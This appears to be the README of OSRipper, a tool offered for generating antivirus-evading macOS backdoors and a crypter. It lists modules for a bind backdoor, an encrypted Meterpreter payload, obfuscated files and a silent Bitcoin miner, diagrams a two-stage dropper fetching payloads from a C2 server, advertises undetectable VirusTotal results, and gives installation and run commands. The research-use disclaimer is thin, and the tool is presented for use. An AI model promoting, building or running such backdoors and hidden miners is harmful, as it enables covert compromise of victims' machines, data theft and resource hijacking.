AV evading OSX Backdoor and Crypter Framework
,-.----. ,----..
,-.----. ,---,\ / \ / / \ .--.--. ,--, ,--,
\ / \ ,`--.' || : \ / . : / / '. |'. \ / .`|
; : \| : :| | .\ : . / ;. \ : /`. / ; \ `\ /' / ;
| | .\ :: | '. : |: | . ; / ` ; | |--` `. \ / / .'
. : |: || : || | \ : ; | ; \ ; | : ;_ \ \/ / ./
| | \ :' ' ;| : . / | : | ; | '\ \ `. \ \.' /
| : . /| | |; | |`-' . | ' ' ' : `----. \ \ ; ;
; | | ' : ;| | ; ' ; \; / | __ \ \ | / \ \ \
| | ;\ \ | ': ' | \ \ ', / / /`--' / ; /\ \ \
: ' | \.' : |: : : ; : / '--'. /./__; \ ; \
: : :-' ; |.' | | : \ \ .' `--'---' | : / \ \ ;
| |.' '---' `---'.| `---` ; |/ \ ' |
`---' `---` `---' `--`
1. Create Bind Backdoor (opens a port on the victim machine and waits for you to connect)
2. Create Encrypted TCP Meterpreter (can embed in other script) (recommended)
3. Create Obfuscated file with custom code
##########################################################################################
Miners
4. Create a silent BTC miner
Please select a module:
OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.
https://www.virustotal.com/gui/file/e7e654893cec4e1f1aa76e2bbfa4bb1e0c6a15adf19236845948877e93013aea (py) https://www.virustotal.com/gui/file-analysis/MjM2MTJiMjI3YTMzM2JjYzExMTJhMzhiMGY4ODQxZjA6MTcwMTcyOTE3MQ== (unix binary)
Hey sorry ive been lost in action revently. happy to say this project still works and the binaries are FUD. Will try to continue as planned
This is the first v0.3 Release. The payloads will now be double staged in order to evade av detection. Please keep in mind that i develop on arch and only test on a few platforms so there are sure to be bugs and you should open issues for them. Biggest difference to last release is that this project isnt focused on macOS anymore but on all platforms. It also now features a web server on which the staged payload is stored. I will develop this server into a C2 to which data will be pushed from the victim. With this update the developtment is officially back in progress.
+-----------------+
| Generated |
| Binary |
+-----------------+
|
| Execute
|
v
+------------------+
|oBFUSCATED dropper|
+------------------+
|
| GET request
|
v
+-----------------+
| |
| C2 SERVER |
| |
+-----------------+
|
| Download
|
v
+-----------------+
| Meterpreter |
| Staged Payload|
| (Stage 1) |
+-----------------+
|
| Download
|
v
+-----------------+
| C2 Server |
+-----------------+
|
| Socket
|
v
+-----------------+
| Meterpreter |
| Staged Payload|
| (Stage 2) |
+-----------------+
Please check the wiki for information on how OSRipper functions (which changes extremely frequently)
https://github.com/SubGlitch1/OSRipper/wiki
Here are example backdoors which were generated with OSRipper
macOS .apps will look like this on vt
You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.
Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.
apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
sudo python3 setup.py
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
python3 setup.py
or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.3
Only this
sudo python3 main.py
Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well
Just open a issue and ill make sure to get back to you
0.2.1
0.1.6
0.1.5
0.1.4
0.1.3
0.1.2
0.1.1
MIT
Inspiration, code snippets, etc.
I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.